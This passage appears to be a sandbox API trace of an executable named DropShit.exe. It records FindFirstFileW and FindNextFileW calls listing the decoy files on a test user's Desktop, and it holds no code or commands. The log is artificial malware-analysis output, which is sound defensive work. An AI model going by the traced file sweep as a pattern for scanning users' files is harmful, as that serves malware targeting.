lpFilePart=0x0) returned 0x25 [0052.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x0) returned 0x26 [0052.365] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.365] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.365] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x761a2300, ftCreationTime.dwHighDateTime=0x1d4cc63, ftLastAccessTime.dwLowDateTime=0xed9262c0, ftLastAccessTime.dwHighDateTime=0x1d4c728, ftLastWriteTime.dwLowDateTime=0xed9262c0, ftLastWriteTime.dwHighDateTime=0x1d4c728, nFileSizeHigh=0x0, nFileSizeLow=0x1771d, dwReserved0=0x0, dwReserved1=0x0, cFileName="37RHCQSHUC_h.pdf", cAlternateFileName="37RHCQ~1.PDF")) returned 1 [0052.365] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22fdcf30, ftCreationTime.dwHighDateTime=0x1d4ce0e, ftLastAccessTime.dwLowDateTime=0x17af3640, ftLastAccessTime.dwHighDateTime=0x1d4d45e, ftLastWriteTime.dwLowDateTime=0x17af3640, ftLastWriteTime.dwHighDateTime=0x1d4d45e, nFileSizeHigh=0x0, nFileSizeLow=0x1600c, dwReserved0=0x0, dwReserved1=0x0, cFileName="6kgIx8PWGUbemC8 e.m4a", cAlternateFileName="6KGIX8~1.M4A")) returned 1 [0052.365] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcba8d70, ftCreationTime.dwHighDateTime=0x1d4cba2, ftLastAccessTime.dwLowDateTime=0x14d92f90, ftLastAccessTime.dwHighDateTime=0x1d4c9ad, ftLastWriteTime.dwLowDateTime=0x14d92f90, ftLastWriteTime.dwHighDateTime=0x1d4c9ad, nFileSizeHigh=0x0, nFileSizeLow=0x7547, dwReserved0=0x0, dwReserved1=0x0, cFileName="6N8dDZ.png", cAlternateFileName="")) returned 1 [0052.365] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fe3080, ftCreationTime.dwHighDateTime=0x1d4c572, ftLastAccessTime.dwLowDateTime=0x897fdce0, ftLastAccessTime.dwHighDateTime=0x1d4d164, ftLastWriteTime.dwLowDateTime=0x897fdce0, ftLastWriteTime.dwHighDateTime=0x1d4d164, nFileSizeHigh=0x0, nFileSizeLow=0xd3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="796XAPyFYmfJ MnK0jSm.wav", cAlternateFileName="796XAP~1.WAV")) returned 1 [0052.366] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb70da3d0, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0xc4c72840, ftLastAccessTime.dwHighDateTime=0x1d4d22b, ftLastWriteTime.dwLowDateTime=0xc4c72840, ftLastWriteTime.dwHighDateTime=0x1d4d22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CKBy", cAlternateFileName="")) returned 1 [0052.366] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0052.366] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x305d6e30, ftCreationTime.dwHighDateTime=0x1d4ccea, ftLastAccessTime.dwLowDateTime=0xab4ed220, ftLastAccessTime.dwHighDateTime=0x1d4cee1, ftLastWriteTime.dwLowDateTime=0xab4ed220, ftLastWriteTime.dwHighDateTime=0x1d4cee1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DIjiqWL1q1qL 2XZCSn-", cAlternateFileName="DIJIQW~1")) returned 1 [0052.366] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 1 [0052.366] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e9e860, ftCreationTime.dwHighDateTime=0x1d4c99a, ftLastAccessTime.dwLowDateTime=0x85cc2d90, ftLastAccessTime.dwHighDateTime=0x1d4d27e, ftLastWriteTime.dwLowDateTime=0x85cc2d90, ftLastWriteTime.dwHighDateTime=0x1d4d27e, nFileSizeHigh=0x0, nFileSizeLow=0x75fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="eviCleE.jpg", cAlternateFileName="")) returned 1 [0052.367] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe882fe20, ftCreationTime.dwHighDateTime=0x1d4cb2e, ftLastAccessTime.dwLowDateTime=0xa8a6e260, ftLastAccessTime.dwHighDateTime=0x1d4c5c7, ftLastWriteTime.dwLowDateTime=0xa8a6e260, ftLastWriteTime.dwHighDateTime=0x1d4c5c7, nFileSizeHigh=0x0, nFileSizeLow=0x81c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="G XV4H2VFKP.flv", cAlternateFileName="GXV4H2~1.FLV")) returned 1 [0052.367] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f33a00, ftCreationTime.dwHighDateTime=0x1d4c9f3, ftLastAccessTime.dwLowDateTime=0xfe5fa570, ftLastAccessTime.dwHighDateTime=0x1d4cb8f, ftLastWriteTime.dwLowDateTime=0xfe5fa570, ftLastWriteTime.dwHighDateTime=0x1d4cb8f, nFileSizeHigh=0x0, nFileSizeLow=0x5345, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hj XdL5IXhby8mCEKqp.swf", cAlternateFileName="HJXDL5~1.SWF")) returned 1 [0052.367] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2a217a0, ftCreationTime.dwHighDateTime=0x1d4d1d8, ftLastAccessTime.dwLowDateTime=0x26485050, ftLastAccessTime.dwHighDateTime=0x1d4cc8f, ftLastWriteTime.dwLowDateTime=0x26485050, ftLastWriteTime.dwHighDateTime=0x1d4cc8f, nFileSizeHigh=0x0, nFileSizeLow=0x813c, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlFfFuLqNkQS6Te7x.avi", cAlternateFileName="MLFFFU~1.AVI")) returned 1 [0052.367] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe13da990, ftCreationTime.dwHighDateTime=0x1d4d09b, ftLastAccessTime.dwLowDateTime=0xe99437a0, ftLastAccessTime.dwHighDateTime=0x1d4c9dc, ftLastWriteTime.dwLowDateTime=0xe99437a0, ftLastWriteTime.dwHighDateTime=0x1d4c9dc, nFileSizeHigh=0x0, nFileSizeLow=0xfd12, dwReserved0=0x0, dwReserved1=0x0, cFileName="n0Z4.gif", cAlternateFileName="")) returned 1 [0052.367] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ec8b30, ftCreationTime.dwHighDateTime=0x1d4c8dd, ftLastAccessTime.dwLowDateTime=0x3ba72070, ftLastAccessTime.dwHighDateTime=0x1d4d1a3, ftLastWriteTime.dwLowDateTime=0x3ba72070, ftLastWriteTime.dwHighDateTime=0x1d4d1a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OoP6PKriG", cAlternateFileName="OOP6PK~1")) returned 1 [0052.367] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd64d630, ftCreationTime.dwHighDateTime=0x1d4c963, ftLastAccessTime.dwLowDateTime=0x9389ae00, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0x9389ae00, ftLastWriteTime.dwHighDateTime=0x1d4ce7b, nFileSizeHigh=0x0, nFileSizeLow=0x686e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ouf5No.avi", cAlternateFileName="")) returned 1 [0052.367] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712aa650, ftCreationTime.dwHighDateTime=0x1d4d436, ftLastAccessTime.dwLowDateTime=0x43a3a0, ftLastAccessTime.dwHighDateTime=0x1d4cef1, ftLastWriteTime.dwLowDateTime=0x43a3a0, ftLastWriteTime.dwHighDateTime=0x1d4cef1, nFileSizeHigh=0x0, nFileSizeLow=0x10175, dwReserved0=0x0, dwReserved1=0x0, cFileName="pDQPiSB7-4XgC4ZA-.gif", cAlternateFileName="PDQPIS~1.GIF")) returned 1 [0052.367] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35278800, ftCreationTime.dwHighDateTime=0x1d4ce6c, ftLastAccessTime.dwLowDateTime=0x489f09e0, ftLastAccessTime.dwHighDateTime=0x1d4d0b4, ftLastWriteTime.dwLowDateTime=0x489f09e0, ftLastWriteTime.dwHighDateTime=0x1d4d0b4, nFileSizeHigh=0x0, nFileSizeLow=0x12084, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkdmaZV7e.mp3", cAlternateFileName="PKDMAZ~1.MP3")) returned 1 [0052.368] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c902830, ftCreationTime.dwHighDateTime=0x1d4c8ee, ftLastAccessTime.dwLowDateTime=0x6b651ec0, ftLastAccessTime.dwHighDateTime=0x1d4ccd0, ftLastWriteTime.dwLowDateTime=0x6b651ec0, ftLastWriteTime.dwHighDateTime=0x1d4ccd0, nFileSizeHigh=0x0, nFileSizeLow=0x7e83, dwReserved0=0x0, dwReserved1=0x0, cFileName="q-tLmzZ7lKvwTQb.m4a", cAlternateFileName="Q-TLMZ~1.M4A")) returned 1 [0052.368] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2209f020, ftCreationTime.dwHighDateTime=0x1d4ce4c, ftLastAccessTime.dwLowDateTime=0x582a0a30, ftLastAccessTime.dwHighDateTime=0x1d4c886, ftLastWriteTime.dwLowDateTime=0x582a0a30, ftLastWriteTime.dwHighDateTime=0x1d4c886, nFileSizeHigh=0x0, nFileSizeLow=0xe21b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Q4reAXGl.flv", cAlternateFileName="")) returned 1 [0052.368] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0b01280, ftCreationTime.dwHighDateTime=0x1d4cecd, ftLastAccessTime.dwLowDateTime=0xa0be8970, ftLastAccessTime.dwHighDateTime=0x1d4d0fa, ftLastWriteTime.dwLowDateTime=0xa0be8970, ftLastWriteTime.dwHighDateTime=0x1d4d0fa, nFileSizeHigh=0x0, nFileSizeLow=0x1ef7, dwReserved0=0x0, dwReserved1=0x0, cFileName="vOXk.png", cAlternateFileName="")) returned 1 [0052.368] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc328ac0, ftCreationTime.dwHighDateTime=0x1d4cc8a, ftLastAccessTime.dwLowDateTime=0x7882add0, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0x7882add0, ftLastWriteTime.dwHighDateTime=0x1d4d3d2, nFileSizeHigh=0x0, nFileSizeLow=0xdc08, dwReserved0=0x0, dwReserved1=0x0, cFileName="WYYIF fH.mp3", cAlternateFileName="WYYIFF~1.MP3")) returned 1 [0052.368] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a99e90, ftCreationTime.dwHighDateTime=0x1d4d1c5, ftLastAccessTime.dwLowDateTime=0x756ce620, ftLastAccessTime.dwHighDateTime=0x1d4cc2e, ftLastWriteTime.dwLowDateTime=0x756ce620, ftLastWriteTime.dwHighDateTime=0x1d4cc2e, nFileSizeHigh=0x0, nFileSizeLow=0x929f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y8yKyDCXcG69KB9nVjK.avi", cAlternateFileName="Y8YKYD~1.AVI")) returned 1 [0052.368] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc12330e0, ftCreationTime.dwHighDateTime=0x1d4d207, ftLastAccessTime.dwLowDateTime=0x9e334ef0, ftLastAccessTime.dwHighDateTime=0x1d4c66b, ftLastWriteTime.dwLowDateTime=0x9e334ef0, ftLastWriteTime.dwHighDateTime=0x1d4c66b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YlFbY0GE9kU8pLG", cAlternateFileName="YLFBY0~1")) returned 1 [0052.368] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb912ad10, ftCreationTime.dwHighDateTime=0x1d4cf71, ftLastAccessTime.dwLowDateTime=0x6f47e9e0, ftLastAccessTime.dwHighDateTime=0x1d4caf1, ftLastWriteTime.dwLowDateTime=0x6f47e9e0, ftLastWriteTime.dwHighDateTime=0x1d4caf1, nFileSizeHigh=0x0, nFileSizeLow=0x141f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZY-CLS.bmp", cAlternateFileName="")) returned 1 [0052.386] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3be5810, ftCreationTime.dwHighDateTime=0x1d4d284, ftLastAccessTime.dwLowDateTime=0x6875deb0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x6875deb0, ftLastWriteTime.dwHighDateTime=0x1d4d47e, nFileSizeHigh=0x0, nFileSizeLow=0x9570, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hKIlKje.swf", cAlternateFileName="")) returned 1 [0052.386] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.386] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dad0) returned 1 [0052.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da90) returned 1 [0052.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0052.386] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0052.386] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x0) returned 0x26 [0052.386] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.386] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.387] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x761a2300, ftCreationTime.dwHighDateTime=0x1d4cc63, ftLastAccessTime.dwLowDateTime=0xed9262c0, ftLastAccessTime.dwHighDateTime=0x1d4c728, ftLastWriteTime.dwLowDateTime=0xed9262c0, ftLastWriteTime.dwHighDateTime=0x1d4c728, nFileSizeHigh=0x0, nFileSizeLow=0x1771d, dwReserved0=0x0, dwReserved1=0x0, cFileName="37RHCQSHUC_h.pdf", cAlternateFileName="37RHCQ~1.PDF")) returned 1 [0052.387] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22fdcf30, ftCreationTime.dwHighDateTime=0x1d4ce0e, ftLastAccessTime.dwLowDateTime=0x17af3640, ftLastAccessTime.dwHighDateTime=0x1d4d45e, ftLastWriteTime.dwLowDateTime=0x17af3640, ftLastWriteTime.dwHighDateTime=0x1d4d45e, nFileSizeHigh=0x0, nFileSizeLow=0x1600c, dwReserved0=0x0, dwReserved1=0x0, cFileName="6kgIx8PWGUbemC8 e.m4a", cAlternateFileName="6KGIX8~1.M4A")) returned 1 [0052.387] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcba8d70, ftCreationTime.dwHighDateTime=0x1d4cba2, ftLastAccessTime.dwLowDateTime=0x14d92f90, ftLastAccessTime.dwHighDateTime=0x1d4c9ad, ftLastWriteTime.dwLowDateTime=0x14d92f90, ftLastWriteTime.dwHighDateTime=0x1d4c9ad, nFileSizeHigh=0x0, nFileSizeLow=0x7547, dwReserved0=0x0, dwReserved1=0x0, cFileName="6N8dDZ.png", cAlternateFileName="")) returned 1 [0052.387] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fe3080, ftCreationTime.dwHighDateTime=0x1d4c572, ftLastAccessTime.dwLowDateTime=0x897fdce0, ftLastAccessTime.dwHighDateTime=0x1d4d164, ftLastWriteTime.dwLowDateTime=0x897fdce0, ftLastWriteTime.dwHighDateTime=0x1d4d164, nFileSizeHigh=0x0, nFileSizeLow=0xd3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="796XAPyFYmfJ MnK0jSm.wav", cAlternateFileName="796XAP~1.WAV")) returned 1 [0052.387] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb70da3d0, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0xc4c72840, ftLastAccessTime.dwHighDateTime=0x1d4d22b, ftLastWriteTime.dwLowDateTime=0xc4c72840, ftLastWriteTime.dwHighDateTime=0x1d4d22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CKBy", cAlternateFileName="")) returned 1 [0052.387] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0052.387] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x305d6e30, ftCreationTime.dwHighDateTime=0x1d4ccea, ftLastAccessTime.dwLowDateTime=0xab4ed220, ftLastAccessTime.dwHighDateTime=0x1d4cee1, ftLastWriteTime.dwLowDateTime=0xab4ed220, ftLastWriteTime.dwHighDateTime=0x1d4cee1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DIjiqWL1q1qL 2XZCSn-", cAlternateFileName="DIJIQW~1")) returned 1 [0052.388] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 1 [0052.388] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e9e860, ftCreationTime.dwHighDateTime=0x1d4c99a, ftLastAccessTime.dwLowDateTime=0x85cc2d90, ftLastAccessTime.dwHighDateTime=0x1d4d27e, ftLastWriteTime.dwLowDateTime=0x85cc2d90, ftLastWriteTime.dwHighDateTime=0x1d4d27e, nFileSizeHigh=0x0, nFileSizeLow=0x75fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="eviCleE.jpg", cAlternateFileName="")) returned 1 [0052.388] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe882fe20, ftCreationTime.dwHighDateTime=0x1d4cb2e, ftLastAccessTime.dwLowDateTime=0xa8a6e260, ftLastAccessTime.dwHighDateTime=0x1d4c5c7, ftLastWriteTime.dwLowDateTime=0xa8a6e260, ftLastWriteTime.dwHighDateTime=0x1d4c5c7, nFileSizeHigh=0x0, nFileSizeLow=0x81c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="G XV4H2VFKP.flv", cAlternateFileName="GXV4H2~1.FLV")) returned 1 [0052.388] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f33a00, ftCreationTime.dwHighDateTime=0x1d4c9f3, ftLastAccessTime.dwLowDateTime=0xfe5fa570, ftLastAccessTime.dwHighDateTime=0x1d4cb8f, ftLastWriteTime.dwLowDateTime=0xfe5fa570, ftLastWriteTime.dwHighDateTime=0x1d4cb8f, nFileSizeHigh=0x0, nFileSizeLow=0x5345, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hj XdL5IXhby8mCEKqp.swf", cAlternateFileName="HJXDL5~1.SWF")) returned 1 [0052.388] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2a217a0, ftCreationTime.dwHighDateTime=0x1d4d1d8, ftLastAccessTime.dwLowDateTime=0x26485050, ftLastAccessTime.dwHighDateTime=0x1d4cc8f, ftLastWriteTime.dwLowDateTime=0x26485050, ftLastWriteTime.dwHighDateTime=0x1d4cc8f, nFileSizeHigh=0x0, nFileSizeLow=0x813c, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlFfFuLqNkQS6Te7x.avi", cAlternateFileName="MLFFFU~1.AVI")) returned 1 [0052.388] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe13da990, ftCreationTime.dwHighDateTime=0x1d4d09b, ftLastAccessTime.dwLowDateTime=0xe99437a0, 